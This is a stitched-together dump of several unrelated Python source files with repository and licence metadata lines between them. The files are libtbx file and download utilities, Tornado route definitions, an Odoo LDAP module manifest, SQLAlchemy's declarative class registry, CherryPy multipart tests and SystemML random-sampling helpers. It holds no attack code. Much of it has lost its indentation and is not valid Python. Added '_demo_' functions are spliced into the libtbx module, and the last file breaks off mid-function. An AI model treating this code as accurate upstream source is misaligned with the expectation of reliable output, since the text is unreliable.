def write_this_is_auto_generated(f, file_name_generator):
print >> f, """\
/* *****************************************************
THIS IS AN AUTOMATICALLY GENERATED FILE. DO NOT EDIT.
*****************************************************
Generated by:
%s
*/
""" % file_name_generator
class import_python_object:
def __init__(self, import_path, error_prefix, target_must_be, where_str):
path_elements = import_path.split(".")
if (len(path_elements) < 2):
raise ValueError(
'%simport path "%s" is too short%s%s' % (
error_prefix, import_path, target_must_be, where_str))
module_path = ".".join(path_elements[:-1])
try: module = __import__(module_path)
except ImportError:
raise ImportError("%sno module %s%s" % (
error_prefix, module_path, where_str))
for attr in path_elements[1:-1]:
module = getattr(module, attr)
try: self.object = getattr(module, path_elements[-1])
except AttributeError:
raise AttributeError(
'%sobject "%s" not found in module "%s"%s' % (
error_prefix, path_elements[-1], module_path, where_str))
self.path_elements = path_elements
self.module_path = module_path
self.module = module
class input_with_prompt(object):
def __init__(self, prompt, tracebacklimit=0):
try: import readline
except Exception: pass
try: self.previous_tracebacklimit = sys.tracebacklimit
except Exception: self.previous_tracebacklimit = None
if (tracebacklimit is not None):
sys.tracebacklimit = tracebacklimit
self.input = raw_input(prompt)
def __del__(self):
if (self.previous_tracebacklimit is None):
del sys.tracebacklimit
else:
sys.tracebacklimit = self.previous_tracebacklimit
def count_max(assert_less_than):
i = 0
while True:
yield None
i += 1
assert i < assert_less_than
class detect_binary_file(object):
def __init__(self, monitor_initial=None, max_fraction_non_ascii=None):
if (monitor_initial is None):
self.monitor_initial = 1000
else:
self.monitor_initial = monitor_initial
if (max_fraction_non_ascii is None):
self.max_fraction_non_ascii = 0.05
else:
self.max_fraction_non_ascii = max_fraction_non_ascii
self.n_ascii_characters = 0
self.n_non_ascii_characters = 0
self.status = None
def is_binary_file(self, block):
if (self.monitor_initial > 0):
for c in block:
if (1 < ord(c) < 128):
self.n_ascii_characters += 1
else:
self.n_non_ascii_characters += 1
self.monitor_initial -= 1
if (self.monitor_initial == 0):
if ( self.n_non_ascii_characters
> self.n_ascii_characters * self.max_fraction_non_ascii):
self.status = True
else:
self.status = False
break
return self.status
def from_initial_block(
file_name,
monitor_initial=None,
max_fraction_non_ascii=None):
detector = detect_binary_file(
monitor_initial=monitor_initial,
max_fraction_non_ascii=max_fraction_non_ascii)
block = open(file_name, "rb").read(detector.monitor_initial)
if (len(block) == 0): return False
detector.monitor_initial = min(len(block), detector.monitor_initial)
return detector.is_binary_file(block=block)
from_initial_block = staticmethod(from_initial_block)
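def _demo_detect_binary_file():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): classify a file from its first 1000 bytes; the path is made up.
  print detect_binary_file.from_initial_block(file_name="example.bin")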
def search_for(
pattern,
mode,
re_flags=0,
lines=None,
file_name=None):
assert mode in ["==", "find", "startswith", "endswith", "re.search", "re.match"]
assert [lines, file_name].count(None) == 1
if (lines is None):
lines = open(file_name).read().splitlines()
result = []
a = result.append
if (mode == "=="):
for l in lines:
if (l == pattern): a(l)
elif (mode == "startswith"):
for l in lines:
if (l.startswith(pattern)): a(l)
elif (mode == "endswith"):
for l in lines:
if (l.endswith(pattern)): a(l)
elif (mode == "find"):
for l in lines:
if (l.find(pattern) >= 0): a(l)
elif (mode == "re.search"):
import re
for l in lines:
if (re.search(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
else:
import re
for l in lines:
if (re.match(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
return result
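def _demo_search_for():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): collect the lines matching a regular expression.
  lines = ["alpha", "beta", "alphabet"]
  assert search_for(pattern="^alpha", mode="re.match", lines=lines) \
    == ["alpha", "alphabet"]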
class progress_displayed_as_fraction(object):
def __init__(self, n):
self.n = n
self.i = 0
if self.n == 1: self.advance = lambda: None
self.advance()
def advance(self):
if self.i > 0: sys.stdout.write('\r')
sys.stdout.write("%i / %i" % (self.i, self.n))
sys.stdout.flush()
self.i += 1
def done(self):
if self.n == 1: return
sys.stdout.write("\n")
sys.stdout.flush()
class progress_bar(progress_displayed_as_fraction):
def advance(self):
characters = ['|']
if self.i > 0:
characters.extend(['=']*(self.i-1))
characters.append('>')
characters.extend(' '*(self.n - self.i))
characters.append('|\r')
sys.stdout.write(''.join(characters))
sys.stdout.flush()
self.i += 1
def format_float_with_standard_uncertainty(value, standard_uncertainty):
if standard_uncertainty < 1e-16: return str(value)
precision = -int(round(math.log10(standard_uncertainty)))
if precision > -1:
su = standard_uncertainty * math.pow(10, precision)
if round(su,1) < 2:
su *= 10
precision += 1
fmt_str = "%%.%if(%%i)" %precision
return fmt_str %(value, round(su))
else:
precision += 1
su = int(round(standard_uncertainty, precision))
fmt_str = "%.0f(%i)"
return fmt_str %(round(value, precision), su)
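def _demo_format_float_with_standard_uncertainty():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): standard crystallographic value(su) formatting.
  assert format_float_with_standard_uncertainty(1.23456, 0.0012) == "1.2346(12)"
  assert format_float_with_standard_uncertainty(123.4, 5.0) == "123(5)"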
def random_hex_code(number_of_digits):
import random
digits = []
for i_digit in xrange(number_of_digits):
i = random.randrange(16)
digits.append("0123456789abcdef"[i])
return "".join(digits)
def get_svn_revision(path=None):
# adapted from:
# http://code.djangoproject.com/browser/django/trunk/django/utils/version.py
rev = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
entries_path = '%s/.svn/entries' % path
try:
entries = open(entries_path, 'r').read()
except IOError:
pass
else:
# Versions >= 7 of the entries file are flat text. The first line is
# the version number. The next set of digits after 'dir' is the revision.
if re.match('(\d+)', entries):
rev_match = re.search('\d+\s+dir\s+(\d+)', entries)
if rev_match:
rev = int(rev_match.groups()[0])
return rev
def get_build_tag(path=None):
tag = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
tag_file_path = "%s/TAG" %path
if op.exists(tag_file_path):
tag = open(tag_file_path).readline().strip()
return tag
def getcwd_safe () :
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
raise Sorry("Could not determine the current working directory because "+
"it has been deleted or unmounted.")
else :
raise e
return cwd
def getcwd_or_default (default=None) :
if (default is None) :
if (os.name == "nt") :
home_drive = os.environ.get("HOMEDRIVE", "C:")
home_dir = os.environ.get("HOMEPATH", "\\")
default = home_drive + home_dir
else :
default = os.environ.get("HOME", "/")
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
cwd = default
else :
raise e
return cwd
def create_run_directory (prefix, default_directory_number=None) :
"""
Create a program output directory using sequential numbering, picking the
highest run ID. In other words, if the prefix is 'Refine' and the current
directory contains subdirectories named Refine_2 and Refine_9, the new
directory will be Refine_10.
"""
dir_number = default_directory_number
if (dir_number is None) :
dir_ids = []
for file_name in os.listdir(os.getcwd()) :
if (os.path.isdir(file_name)) and (file_name.startswith(prefix)) :
dir_id = file_name.split("_")[-1]
if (dir_id.isdigit()) :
dir_ids.append(int(dir_id))
if (len(dir_ids) > 0) :
dir_number = max(max(dir_ids) + 1, 1)
else :
dir_number = 1
dir_name = prefix + "_" + str(dir_number)
if (os.path.isdir(dir_name)) :
raise OSError("The directory %s already exists."%os.path.abspath(dir_name))
else :
os.makedirs(dir_name)
return os.path.abspath(dir_name)
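def _demo_create_run_directory():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): with Refine_2 and Refine_9 present, this creates Refine_10.
  print create_run_directory(prefix="Refine")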
class tmp_dir_wrapper (object) :
"""
Convenience methods for running in a (presumably empty) temporary directory
and copying all files to another directory. Can be used whether or not the
temporary directory is actually defined; if None, no action will be taken.
Otherwise, both tmp_dir and dest_dir (default is current directory) must be
existing paths.
"""
def __init__ (self, tmp_dir, dest_dir=None, out=sys.stdout) :
if (dest_dir is None) :
dest_dir = os.getcwd()
self.tmp_dir = tmp_dir
self.dest_dir = dest_dir
if (tmp_dir is None) :
pass
elif (not os.path.isdir(tmp_dir)) :
raise Sorry("The temporary directory %s does not exist." % tmp_dir)
else :
if (not os.path.isdir(dest_dir)) :
raise Sorry("The destination directory %s does not exist." % dest_dir)
print >> out, "Changing working directory to %s" % tmp_dir
print >> out, "Ultimate destination is %s" % dest_dir
os.chdir(tmp_dir)
def transfer_files (self, out=sys.stdout) :
if (self.tmp_dir is None) : return False
assert os.path.isdir(self.dest_dir)
files = os.listdir(self.tmp_dir)
print >> out, "Copying all output files to %s" % self.dest_dir
for file_name in files :
print >> out, " ... %s" % file_name
shutil.copy(os.path.join(self.tmp_dir, file_name), self.dest_dir)
print >> out, ""
return True
def show_development_warning (out=sys.stdout) :
print >> out, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! WARNING - EXPERIMENTAL PROGRAM !!
!! !!
!! This program is still in development - some functionality may be !!
!! missing and/or untested. Use at your own risk! For bug reports, etc. !!
!! email [email protected]. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def check_if_output_directory_exists (file_name=None, dir_name=None) :
if (file_name is not None) :
assert (dir_name is None)
dir_name = os.path.dirname(file_name)
if (dir_name == "") : return
if (dir_name is None) :
raise Sorry("No output directory specified.")
if (not op.isdir(dir_name)) :
raise Sorry(("The specified output directory (%s) does not exist or "+
"is not a directory.") % dir_name)
else :
# XXX writing to Dropbox folders is generally not a good idea
head, tail = os.path.split(dir_name)
while tail != "" :
if (tail == "Dropbox") :
warnings.warn("You are directing output to a Dropbox directory. "+
"Please note that this is not guaranteed to work in all cases; "+
"use at your own risk.", UserWarning)
head, tail = os.path.split(head)
def concatenate_python_script (out, file_name) :
"""
Insert a Python script into an existing file, removing any __future__
import to prevent syntax errors. (This could be dangerous in most contexts
but is required for some of our Coot-related scripts to work.)
"""
data = open(file_name, "r").read()
print >> out, ""
print >> out, "#--- script copied from %s" % os.path.basename(file_name)
for line in data.splitlines() :
if line.startswith("from __future__") :
continue
else :
print >> out, line
print >> out, "#--- end"
print >> out, ""
def greek_time(secs):
for greek in ["","milli", "micro", "nano"]:
if secs>1:
break
secs*=1000
return secs, greek
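def _demo_greek_time():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): scale a short duration into the largest unit above 1.
  print greek_time(0.0025)  # -> approximately (2.5, "milli")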
###########################
# URL retrieval functions #
###########################
libtbx_urllib_proxy = None
def install_urllib_http_proxy (server, port=80, user=None, password=None) :
global libtbx_urllib_proxy
import urllib2
if (user is None) :
proxy = urllib2.ProxyHandler({'http': '%s:%d' % (server, port) })
opener = urllib2.build_opener(proxy)
else :
proxy = urllib2.ProxyHandler({
'http': 'http://%s:%s@%s:%s' % (user, password, server, port),
})
auth = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(proxy, auth, urllib2.HTTPHandler)
libtbx_urllib_proxy = proxy
urllib2.install_opener(opener)
print "Installed urllib2 proxy at %s:%d" % (server, port)
return proxy
def urlopen (*args, **kwds) :
"""
Substitute for urllib2.urlopen, with automatic HTTP proxy configuration
if specific environment variables are defined.
"""
if ("CCTBX_HTTP_PROXY" in os.environ) and (libtbx_urllib_proxy is None) :
server = os.environ["CCTBX_HTTP_PROXY_SERVER"]
port = os.environ.get("CCTBX_HTTP_PROXY_PORT", 80)
user = os.environ.get("CCTBX_HTTP_PROXY_USER", None)
    password = os.environ.get("CCTBX_HTTP_PROXY_PASSWORD", None)
    if (user is not None) and (password is None) :
raise Sorry("You have defined a user name for the HTTP proxy, but "+
"no password was specified. Please set the environment variable "+
"CCTBX_HTTP_PROXY_PASSWORD.")
install_urllib_http_proxy(
server=server,
port=port,
user=user,
password=password)
import urllib2
return urllib2.urlopen(*args, **kwds)
class download_progress (object) :
"""
Simple proxy for displaying download status - here with methods for
writing to the console, but can be subclassed and used for graphical display.
"""
def __init__ (self, log=None, n_kb_total=None) :
if (log is None) :
log = null_out()
self.log = log
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def set_total_size (self, n_kb_total) :
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def increment (self, n_kb) :
assert (self.n_kb_total is not None)
self.n_kb_elapsed += n_kb
return self.show_progress()
def show_progress (self) :
self.log.write("\r%d/%d KB downloaded" % (self.n_kb_elapsed,
self.n_kb_total))
self.log.flush()
return True
def percent_finished (self) :
assert (self.n_kb_total is not None)
    return 100 * min(1.0, float(self.n_kb_elapsed) / self.n_kb_total)
def complete (self) :
self.log.write("\rDownload complete")
def run_continuously (self) :
"""
Placeholder for cases where the download is not being run asynchronously.
"""
pass
class download_target (object) :
"""
Flexible callable object for retrieving a file from a URL, with optional
HTTPS authentication. Designed to be runnable in a separate thread with
graphical progress update.
Note that in some circumstances SSL support may be missing from the socket
module, in which case we use 'curl' to download securely. (This will not
work on Windows, obviously.)
"""
def __init__ (self,
url,
file_name,
use_curl=None, # SSL only
user=None, # SSL only
password=None, # SSL only
base_url=None) : # SSL only
self.url = url
self.file_name = file_name
self.use_curl = use_curl
self.user = user
self.password = password
self.base_url = base_url
if (not None in [self.user, self.password]) :
assert (self.base_url is not None)
import socket
if ((not self.use_curl) and (hasattr(socket, "ssl")) and
(hasattr(socket.ssl, "__call__"))) :
self.use_curl = False
else :
self.use_curl = True
def __call__ (self, log=None, progress_meter=None) :
if (log is None) :
log = null_out()
if (progress_meter is None) :
progress_meter = download_progress(log=log)
from libtbx import easy_run
import urllib2
file_name = self.file_name # return value
if (not self.use_curl) :
if (not None in [self.user, self.password]) :
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, self.base_url, self.user, self.password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
req = urllib2.urlopen(self.url)
info = req.info()
n_kb_total = int(info['Content-length']) / 1024
progress_meter.set_total_size(n_kb_total)
# TODO adjust chunk size automatically based on download speed
n_kb_chunk = getattr(self, "n_kb_chunk", 512)
chunksize = n_kb_chunk * 1024
fp = open(self.file_name, 'wb')
while True:
chunk = req.read(chunksize)
if not chunk: break
if not progress_meter.increment(n_kb_chunk) :
file_name = None
break
fp.write(chunk)
fp.close()
progress_meter.complete()
else :
progress_meter.run_continuously()
if (not None in [self.user, self.password]) :
curl_args = "--user %s:%s" % (self.user, self.password)
rc = easy_run.call("curl %s \"%s\" -o %s" % (curl_args, self.url,
self.file_name))
progress_meter.complete()
if (rc != 0) :
raise RuntimeError("curl exited with code %d" % rc)
if (file_name is None) :
return None
return op.abspath(self.file_name)
| mit |
ptphp/PyLib | src/tornado/demos/Vulpix-master/handlers.py | 2 | 1560 | # -*- coding: utf-8 -*-
# AUTHOR: Zeray Rice <[email protected]>
# FILE: handlers.py
# CREATED: 01:41:06 08/03/2012
# MODIFIED: 20:28:26 18/04/2012
# DESCRIPTION: URL Route
from api import *
from home import *
from lang import *
from forum import *
from member import *
from problem import *
from contest import *
from backstage import *
'''
'' Handler naming convention: [verb-object phrase / noun] + Handler
'''
handlers = [
(r'/', HomeHandler),
(r'/signin', SigninHandler),
(r'/signup', SignupHandler),
(r'/signout', SignoutHandler),
(r'/settings', SettingsHandler),
(r'/settings/changepass', ChangePasswordHandler),
(r'/member', ListMemberHandler),
(r'/member/(.*)', MemberHandler),
(r'/lang/(.*)', SetLanguageHandler),
(r'/problem', ListProblemHandler),
(r'/problem/([\d]*)', ViewProblemHandler),
(r'/tag/(.*)', ViewTagHandler),
(r'/submit', ListSubmitHandler),
(r'/submit/(.*)', ViewSubmitHandler),
(r'/backstage/problem/add', AddProblemHandler),
(r'/backstage/contest/add', AddContestHandler),
(r'/backstage/node/add', AddNodeHandler),
(r'/backstage/judger', ManageJudgerHandler),
(r'/backstage/judger/add', AddJudgerHandler),
(r'/contest', ListContestHandlder),
(r'/contest/([\d]*)', ViewContestHandler),
(r'/go/(.*)', ViewNodeHandler),
(r'/t/([\d]*)', ViewTopicHandler),
(r'/new/(.*)', CreateTopicHandler),
(r'/forum', ViewForumHandler),
(r'/test', TestHandler),
(r'/api/problem/get/([\d]*)', GetProblemHandler),
]
| apache-2.0 |
nhomar/odoo-mirror | addons/auth_ldap/__openerp__.py | 50 | 1567 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Authentication via LDAP',
'version' : '1.0',
'depends' : ['base'],
'images' : ['images/ldap_configuration.jpeg'],
'author' : 'OpenERP SA',
#'description': < auto-loaded from README file
'website' : 'https://www.odoo.com',
'category' : 'Authentication',
'data' : [
'users_ldap_view.xml',
'user_ldap_installer.xml',
'security/ir.model.access.csv',
],
'auto_install': False,
'installable': True,
'external_dependencies' : {
'python' : ['ldap'],
}
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mitsuhiko/sqlalchemy | lib/sqlalchemy/ext/declarative/clsregistry.py | 6 | 9816 | # ext/declarative/clsregistry.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Routines to handle the string class registry used by declarative.
This system allows specification of classes and expressions used in
:func:`.relationship` using strings.
"""
from ...orm.properties import ColumnProperty, RelationshipProperty, \
SynonymProperty
from ...schema import _get_table_key
from ...orm import class_mapper, interfaces
from ... import util
from ... import exc
import weakref
# strong references to registries which we place in
# the _decl_class_registry, which is usually weak referencing.
# the internal registries here link to classes with weakrefs and remove
# themselves when all references to contained classes are removed.
_registries = set()
def add_class(classname, cls):
"""Add a class to the _decl_class_registry associated with the
given declarative class.
"""
if classname in cls._decl_class_registry:
# class already exists.
existing = cls._decl_class_registry[classname]
if not isinstance(existing, _MultipleClassMarker):
existing = \
cls._decl_class_registry[classname] = \
_MultipleClassMarker([cls, existing])
else:
cls._decl_class_registry[classname] = cls
try:
root_module = cls._decl_class_registry['_sa_module_registry']
except KeyError:
cls._decl_class_registry['_sa_module_registry'] = \
root_module = _ModuleMarker('_sa_module_registry', None)
tokens = cls.__module__.split(".")
# build up a tree like this:
# modulename: myapp.snacks.nuts
#
# myapp->snack->nuts->(classes)
# snack->nuts->(classes)
# nuts->(classes)
#
# this allows partial token paths to be used.
while tokens:
token = tokens.pop(0)
module = root_module.get_module(token)
for token in tokens:
module = module.get_module(token)
module.add_class(classname, cls)
class _MultipleClassMarker(object):
"""refers to multiple classes of the same name
within _decl_class_registry.
"""
def __init__(self, classes, on_remove=None):
self.on_remove = on_remove
self.contents = set([
weakref.ref(item, self._remove_item) for item in classes])
_registries.add(self)
def __iter__(self):
return (ref() for ref in self.contents)
def attempt_get(self, path, key):
if len(self.contents) > 1:
raise exc.InvalidRequestError(
"Multiple classes found for path \"%s\" "
"in the registry of this declarative "
"base. Please use a fully module-qualified path." %
(".".join(path + [key]))
)
else:
ref = list(self.contents)[0]
cls = ref()
if cls is None:
raise NameError(key)
return cls
def _remove_item(self, ref):
self.contents.remove(ref)
if not self.contents:
_registries.discard(self)
if self.on_remove:
self.on_remove()
def add_item(self, item):
modules = set([cls().__module__ for cls in self.contents])
if item.__module__ in modules:
util.warn(
"This declarative base already contains a class with the "
"same class name and module name as %s.%s, and will "
"be replaced in the string-lookup table." % (
item.__module__,
item.__name__
)
)
self.contents.add(weakref.ref(item, self._remove_item))
class _ModuleMarker(object):
""""refers to a module name within
_decl_class_registry.
"""
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.contents = {}
self.mod_ns = _ModNS(self)
if self.parent:
self.path = self.parent.path + [self.name]
else:
self.path = []
_registries.add(self)
def __contains__(self, name):
return name in self.contents
def __getitem__(self, name):
return self.contents[name]
def _remove_item(self, name):
self.contents.pop(name, None)
if not self.contents and self.parent is not None:
self.parent._remove_item(self.name)
_registries.discard(self)
def resolve_attr(self, key):
return getattr(self.mod_ns, key)
def get_module(self, name):
if name not in self.contents:
marker = _ModuleMarker(name, self)
self.contents[name] = marker
else:
marker = self.contents[name]
return marker
def add_class(self, name, cls):
if name in self.contents:
existing = self.contents[name]
existing.add_item(cls)
else:
existing = self.contents[name] = \
_MultipleClassMarker([cls],
on_remove=lambda: self._remove_item(name))
class _ModNS(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
try:
value = self.__parent.contents[key]
except KeyError:
pass
else:
if value is not None:
if isinstance(value, _ModuleMarker):
return value.mod_ns
else:
assert isinstance(value, _MultipleClassMarker)
return value.attempt_get(self.__parent.path, key)
raise AttributeError("Module %r has no mapped classes "
"registered under the name %r" % (self.__parent.name, key))
class _GetColumns(object):
def __init__(self, cls):
self.cls = cls
def __getattr__(self, key):
mp = class_mapper(self.cls, configure=False)
if mp:
if key not in mp.all_orm_descriptors:
raise exc.InvalidRequestError(
"Class %r does not have a mapped column named %r"
% (self.cls, key))
desc = mp.all_orm_descriptors[key]
if desc.extension_type is interfaces.NOT_EXTENSION:
prop = desc.property
if isinstance(prop, SynonymProperty):
key = prop.name
elif not isinstance(prop, ColumnProperty):
raise exc.InvalidRequestError(
"Property %r is not an instance of"
" ColumnProperty (i.e. does not correspond"
" directly to a Column)." % key)
return getattr(self.cls, key)
class _GetTable(object):
def __init__(self, key, metadata):
self.key = key
self.metadata = metadata
def __getattr__(self, key):
return self.metadata.tables[
_get_table_key(key, self.key)
]
def _determine_container(key, value):
if isinstance(value, _MultipleClassMarker):
value = value.attempt_get([], key)
return _GetColumns(value)
def _resolver(cls, prop):
def resolve_arg(arg):
import sqlalchemy
from sqlalchemy.orm import foreign, remote
fallback = sqlalchemy.__dict__.copy()
fallback.update({'foreign': foreign, 'remote': remote})
def access_cls(key):
if key in cls._decl_class_registry:
return _determine_container(key, cls._decl_class_registry[key])
elif key in cls.metadata.tables:
return cls.metadata.tables[key]
elif key in cls.metadata._schemas:
return _GetTable(key, cls.metadata)
elif '_sa_module_registry' in cls._decl_class_registry and \
key in cls._decl_class_registry['_sa_module_registry']:
registry = cls._decl_class_registry['_sa_module_registry']
return registry.resolve_attr(key)
else:
return fallback[key]
d = util.PopulateDict(access_cls)
def return_cls():
try:
x = eval(arg, globals(), d)
if isinstance(x, _GetColumns):
return x.cls
else:
return x
except NameError as n:
raise exc.InvalidRequestError(
"When initializing mapper %s, expression %r failed to "
"locate a name (%r). If this is a class name, consider "
"adding this relationship() to the %r class after "
"both dependent classes have been defined." %
(prop.parent, arg, n.args[0], cls)
)
return return_cls
return resolve_arg
def _deferred_relationship(cls, prop):
if isinstance(prop, RelationshipProperty):
resolve_arg = _resolver(cls, prop)
for attr in ('argument', 'order_by', 'primaryjoin', 'secondaryjoin',
'secondary', '_user_defined_foreign_keys', 'remote_side'):
v = getattr(prop, attr)
if isinstance(v, str):
setattr(prop, attr, resolve_arg(v))
if prop.backref and isinstance(prop.backref, tuple):
key, kwargs = prop.backref
for attr in ('primaryjoin', 'secondaryjoin', 'secondary',
'foreign_keys', 'remote_side', 'order_by'):
if attr in kwargs and isinstance(kwargs[attr], str):
kwargs[attr] = resolve_arg(kwargs[attr])
return prop
| mit |
CeltonMcGrath/TACTIC | 3rd_party/CherryPy/cherrypy/test/test_mime.py | 6 | 3459 | """Tests for various MIME issues, including the safe_multipart Tool."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
def setup_server():
class Root:
def multipart(self, parts):
return repr(parts)
multipart.exposed = True
def flashupload(self, Filedata, Upload, Filename):
return ("Upload: %r, Filename: %r, Filedata: %r" %
(Upload, Filename, Filedata.file.read()))
flashupload.exposed = True
cherrypy.config.update({'server.max_request_body_size': 0})
cherrypy.tree.mount(Root())
# Client-side code #
from cherrypy.test import helper
class MultipartTest(helper.CPWebCase):
def test_multipart(self):
text_part = u"This is the text version"
html_part = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
This is the <strong>HTML</strong> version
</body>
</html>
"""
body = '\r\n'.join([
"--123456789",
"Content-Type: text/plain; charset='ISO-8859-1'",
"Content-Transfer-Encoding: 7bit",
"",
text_part,
"--123456789",
"Content-Type: text/html; charset='ISO-8859-1'",
"",
html_part,
"--123456789--"])
headers = [
('Content-Type', 'multipart/mixed; boundary=123456789'),
('Content-Length', len(body)),
]
self.getPage('/multipart', headers, "POST", body)
self.assertBody(repr([text_part, html_part]))
class SafeMultipartHandlingTest(helper.CPWebCase):
def test_Flash_Upload(self):
headers = [
('Accept', 'text/*'),
('Content-Type', 'multipart/form-data; '
'boundary=----------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6'),
('User-Agent', 'Shockwave Flash'),
('Host', 'www.example.com:8080'),
('Content-Length', '499'),
('Connection', 'Keep-Alive'),
('Cache-Control', 'no-cache'),
]
filedata = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<projectDescription>\r\n'
'</projectDescription>\r\n')
body = (
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Filename"\r\n'
'\r\n'
'.project\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; '
'name="Filedata"; filename=".project"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
+ filedata +
'\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Upload"\r\n'
'\r\n'
'Submit Query\r\n'
# Flash apps omit the trailing \r\n on the last line:
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6--'
)
self.getPage('/flashupload', headers, "POST", body)
self.assertBody("Upload: u'Submit Query', Filename: u'.project', "
"Filedata: %r" % filedata)
if __name__ == '__main__':
helper.testmain()
| epl-1.0 |
asurve/incubator-systemml | src/main/python/systemml/random/sampling.py | 13 | 5293 | #-------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#-------------------------------------------------------------
__all__ = ['normal', 'uniform', 'poisson']
from ..defmatrix import *
# Special object used internally to specify the placeholder which will be replaced by output ID
# This helps to provide dml containing output ID in constructSamplingNode
OUTPUT_ID = '$$OutputID$$'
def constructSamplingNode(inputs, dml):
"""
Convenient utility to create an intermediate of AST.
Parameters
----------
inputs = list of input matrix objects and/or DMLOp
    dml = list of DML strings (which will eventually be joined before execution). To refer to the output ID, use the OUTPUT_ID placeholder
"""
dmlOp = DMLOp(inputs)
out = matrix(None, op=dmlOp)
dmlOp.dml = [out.ID if x==OUTPUT_ID else x for x in dml]
return out
INPUTS = []
def asStr(arg):
    """
    Internal use only: Convenient utility to update INPUTS and return the appropriate string value
    """
    global INPUTS
    if isinstance(arg, matrix):
        INPUTS = INPUTS + [ arg ]
        return arg.ID
    else:
        return str(arg)
def normal(loc=0.0, scale=1.0, size=(1,1), sparsity=1.0):
"""
Draw random samples from a normal (Gaussian) distribution.
Parameters
----------
loc: Mean ("centre") of the distribution.
scale: Standard deviation (spread or "width") of the distribution.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.normal(loc=3, scale=2, size=(3,3))
>>> m1.toNumPy()
array([[ 3.48857226, 6.17261819, 2.51167259],
[ 3.60506708, -1.90266305, 3.97601633],
[ 3.62245706, 5.9430881 , 2.53070413]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
    global INPUTS
    INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
loc = asStr(loc)
scale = asStr(scale)
sparsity = asStr(sparsity)
# loc + scale*standard normal
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = ', loc,' + ', scale,' * random.normal(', rows, ',', cols, ',', sparsity, ')\n'])
def uniform(low=0.0, high=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a uniform distribution.
Parameters
----------
low: Lower boundary of the output interval.
high: Upper boundary of the output interval.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.uniform(size=(3,3))
>>> m1.toNumPy()
array([[ 0.54511396, 0.11937437, 0.72975775],
[ 0.14135946, 0.01944448, 0.52544478],
[ 0.67582422, 0.87068849, 0.02766852]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
    global INPUTS
    INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
low = asStr(low)
high = asStr(high)
